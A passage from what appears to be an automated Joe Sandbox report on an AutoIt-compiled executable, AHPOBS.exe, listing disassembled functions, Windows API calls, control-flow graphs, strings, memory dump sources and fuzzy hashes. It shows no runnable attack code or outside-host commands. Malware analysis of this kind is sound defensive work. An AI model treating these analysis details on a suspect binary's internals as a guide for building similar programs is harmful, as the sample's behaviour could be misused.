                                      • __wcsicoll.LIBCMT ref: 00402049
                                      • _wcscpy.LIBCMT ref: 0040207C
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104), ref: 00428B5B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\AHPOBS.exe$CMDLINE$CMDLINERAW
                                      • API String ID: 3948761352-4084628596
                                      • Opcode ID: 9da1b3193381690810b208c7d75faa33453babfcd00f8ecbd85b0c6d415dce0f
                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                      • Opcode Fuzzy Hash: 9da1b3193381690810b208c7d75faa33453babfcd00f8ecbd85b0c6d415dce0f
                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                      Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_fseek_wcscpy
                                      • String ID: D)E$D)E$FILE
                                      • API String ID: 3888824918-361185794
                                      • Opcode ID: bbb9a7b4761f969ec3dea54db53098c81d7cb11648b9d4801554aeee4ae9a60f
                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                      • Opcode Fuzzy Hash: bbb9a7b4761f969ec3dea54db53098c81d7cb11648b9d4801554aeee4ae9a60f
                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                      Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcsncat.LIBCMT ref: 0040E433
                                      • __wmakepath.LIBCMT ref: 0040E44F
                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • _wcscpy.LIBCMT ref: 0040E487
                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • _wcscat.LIBCMT ref: 00427541
                                      • _wcslen.LIBCMT ref: 00427551
                                      • _wcslen.LIBCMT ref: 00427562
                                      • _wcscat.LIBCMT ref: 0042757C
                                      • _wcsncpy.LIBCMT ref: 004275BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                      • String ID: Include$\
                                      • API String ID: 3173733714-3429789819
                                      • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                      • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                      Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1896 433493-4334b8 WSAStartup 1897 433570-433583 call 411567 1896->1897 1898 4334be-4334df gethostname gethostbyname 1896->1898 1898->1897 1900 4334e5-4334ec 1898->1900 1902 4334ee-4334f0 1900->1902 1903 4334fc-4334fe 1900->1903 1904 4334f3-4334fa 1902->1904 1905 433500-433519 call 411567 WSACleanup 1903->1905 1906 43351a-43356f call 410e60 inet_ntoa call 413650 call 43299a call 411567 call 4111dc WSACleanup 1903->1906 1904->1903 1904->1904
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 1965227024-3771769585
                                      • Opcode ID: 9a1ef4700a6ee80d5bd18ba7189a542239e9f412f046b2ffe7e413c52583f7c1
                                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                      • Opcode Fuzzy Hash: 9a1ef4700a6ee80d5bd18ba7189a542239e9f412f046b2ffe7e413c52583f7c1
                                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                      Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _fseek.LIBCMT ref: 0045292B
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                      • __fread_nolock.LIBCMT ref: 00452961
                                      • __fread_nolock.LIBCMT ref: 00452971
                                      • __fread_nolock.LIBCMT ref: 0045298A
                                      • __fread_nolock.LIBCMT ref: 004529A5
                                      • _fseek.LIBCMT ref: 004529BF
                                      • _malloc.LIBCMT ref: 004529CA
                                      • _malloc.LIBCMT ref: 004529D6
                                      • __fread_nolock.LIBCMT ref: 004529E7
                                      • _free.LIBCMT ref: 00452A17
                                      • _free.LIBCMT ref: 00452A20
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                      • String ID:
                                      • API String ID: 1255752989-0
                                      • Opcode ID: 5a218435c829d2321405f0f111fa343c554f0bfb103fe72beee7d734b0ea72ca
                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                      • Opcode Fuzzy Hash: 5a218435c829d2321405f0f111fa343c554f0bfb103fe72beee7d734b0ea72ca
                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                      Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                      • ImageList_ReplaceIcon.COMCTL32(00BCF7D8,000000FF,00000000), ref: 00410552
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                      Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BCF7D8,000000FF,00000000), ref: 00410552
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                      Function 0046BEB2 Relevance: 16.9, APIs: 11, Instructions: 400registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1969 46beb2-46bf55 call 40bc70 * 3 call 40e710 call 45340c call 401b10 call 463980 call 46379b 1986 46bf57-46bf6b call 403c90 1969->1986 1987 46bf70-46bf7c call 436565 1969->1987 1992 46c324-46c347 call 402250 * 3 1986->1992 1993 46bfc5 1987->1993 1994 46bf7e-46bf95 RegConnectRegistryW 1987->1994 1995 46bfc9-46bfe9 RegOpenKeyExW 1993->1995 1997 46bf97-46bfba call 403cd0 call 403c90 1994->1997 1998 46bfbf-46bfc3 1994->1998 1999 46c022-46c055 call 45340c RegQueryValueExW 1995->1999 2000 46bfeb-46c004 call 403cd0 1995->2000 1997->1992 1998->1995 2015 46c057-46c087 call 403cd0 call 403c90 RegCloseKey 1999->2015 2016 46c092-46c0ab call 403cd0 1999->2016 2013 46c006-46c007 RegCloseKey 2000->2013 2014 46c00d-46c01d call 403c90 2000->2014 2013->2014 2014->1992 2015->1992 2033 46c08d 2015->2033 2025 46c0b1 2016->2025 2026 46c2fc-46c307 call 403c90 2016->2026 2025->2026 2029 46c297-46c2c5 call 453132 call 45340c RegQueryValueExW 2025->2029 2030 46c23e-46c275 call 45340c RegQueryValueExW 2025->2030 2031 46c15b-46c1a6 call 4115d7 call 45340c RegQueryValueExW 2025->2031 2032 46c0b8-46c0ff call 4115d7 call 45340c RegQueryValueExW 2025->2032 2035 46c30c-46c31f RegCloseKey 2026->2035 2029->2035 2053 46c2c7-46c2fa call 403cd0 call 403c90 call 408f40 2029->2053 2044 46c277 2030->2044 2045 46c27d-46c295 call 408f40 2030->2045 2057 46c211-46c239 call 403cd0 call 403c90 call 4111dc 2031->2057 2058 46c1a8-46c1bf 2031->2058 2055 46c101-46c125 call 40e710 call 4111dc 2032->2055 2056 46c12a-46c156 call 403cd0 call 403c90 call 4111dc 2032->2056 2039 46c321-46c322 RegCloseKey 2033->2039 2035->1992 2035->2039 2039->1992 2044->2045 2045->2035 2053->2035 2055->2035 2056->2035 2057->2035 2059 46c1c1-46c1c7 2058->2059 2060 46c1fc-46c20c call 40e710 call 4111dc 2058->2060 2066 46c1ce-46c1d2 2059->2066 2067 46c1c9-46c1ca 2059->2067 2060->2035 2074 46c1d4-46c1d9 2066->2074 2075 46c1ed-46c1f3 2066->2075 2067->2066 2081 46c1db-46c1e4 2074->2081 2082 46c1e8-46c1eb 2074->2082 2075->2060 2084 46c1f5-46c1f7 2075->2084 2081->2082 2082->2074 2082->2075 2084->2060
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BF8D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: 665d78321b16556ab0d3437a6a7b046631928895fae13efc9901a8b94e14fb35
                                      • Instruction ID: 33baa24a15bb30b806ffdc3d4c8c2128b8dbdbb38b4108e5c3e965d5e336c96e
                                      • Opcode Fuzzy Hash: 665d78321b16556ab0d3437a6a7b046631928895fae13efc9901a8b94e14fb35
                                      • Instruction Fuzzy Hash: 89E17471204200ABD714EF69CD85F2BB7E8AF88704F14891EF985DB381D779E941CB9A
                                      Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _malloc
                                      • String ID: Default
                                      • API String ID: 1579825452-753088835
                                      • Opcode ID: fb09f9ae9c6d9d8d146d04252a7228c7bc6bb3d62ba3194af7ee300fb72b492a
                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                      • Opcode Fuzzy Hash: fb09f9ae9c6d9d8d146d04252a7228c7bc6bb3d62ba3194af7ee300fb72b492a
                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                      Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2526 40f5c0-40f5cf call 422240 2529 40f5d0-40f5e8 2526->2529 2529->2529 2530 40f5ea-40f613 call 413650 call 410e60 2529->2530 2535 40f614-40f633 call 414d04 2530->2535 2538 40f691 2535->2538 2539 40f635-40f63c 2535->2539 2540 40f696-40f69c 2538->2540 2541 40f660-40f674 call 4150d1 2539->2541 2542 40f63e 2539->2542 2546 40f679-40f67c 2541->2546 2543 40f640 2542->2543 2545 40f642-40f650 2543->2545 2547 40f652-40f655 2545->2547 2548 40f67e-40f68c 2545->2548 2546->2535 2549 40f65b-40f65e 2547->2549 2550 425d1e-425d3e call 4150d1 call 414d04 2547->2550 2551 40f68e-40f68f 2548->2551 2552 40f69f-40f6ad 2548->2552 2549->2541 2549->2543 2563 425d43-425d5f call 414d30 2550->2563 2551->2547 2554 40f6b4-40f6c2 2552->2554 2555 40f6af-40f6b2 2552->2555 2557 425d16 2554->2557 2558 40f6c8-40f6d6 2554->2558 2555->2547 2557->2550 2560 425d05-425d0b 2558->2560 2561 40f6dc-40f6df 2558->2561 2560->2545 2562 425d11 2560->2562 2561->2547 2562->2557 2563->2540
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                      • String ID: AU3!$EA06
                                      • API String ID: 1268643489-2658333250
                                      • Opcode ID: eec17673349e6d1fef762f4766216b85eb19fa57de04761bf77a8f4232215354
                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                      • Opcode Fuzzy Hash: eec17673349e6d1fef762f4766216b85eb19fa57de04761bf77a8f4232215354
                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                      Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2566 401100-401111 2567 401113-401119 2566->2567 2568 401179-401180 2566->2568 2570 401144-40114a 2567->2570 2571 40111b-40111e 2567->2571 2568->2567 2569 401182 2568->2569 2572 40112c-401141 DefWindowProcW 2569->2572 2574 401184-40118e call 401250 2570->2574 2575 40114c-40114f 2570->2575 2571->2570 2573 401120-401126 2571->2573 2573->2572 2577 42b038-42b03f 2573->2577 2581 401193-40119a 2574->2581 2578 401151-401157 2575->2578 2579 40119d 2575->2579 2577->2572 2580 42b045-42b059 call 401000 call 40e0c0 2577->2580 2584 401219-40121f 2578->2584 2585 40115d 2578->2585 2582 4011a3-4011a9 2579->2582 2583 42afb4-42afc5 call 40f190 2579->2583 2580->2572 2582->2573 2588 4011af 2582->2588 2583->2581 2584->2573 2591 401225-42b06d call 468b0e 2584->2591 2589 401163-401166 2585->2589 2590 42b01d-42b024 2585->2590 2588->2573 2595 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2588->2595 2596 4011db-401202 SetTimer RegisterWindowMessageW 2588->2596 2598 42afe9-42b018 call 40f190 call 401a50 2589->2598 2599 40116c-401172 2589->2599 2590->2572 2597 42b02a-42b033 call 4370f4 2590->2597 2591->2581 2596->2581 2605 401204-401216 CreatePopupMenu 2596->2605 2597->2572 2598->2572 2599->2573 2600 401174-42afde call 45fd57 2599->2600 2600->2572 2617 42afe4 2600->2617 2617->2581
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                      • CreatePopupMenu.USER32 ref: 00401204
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
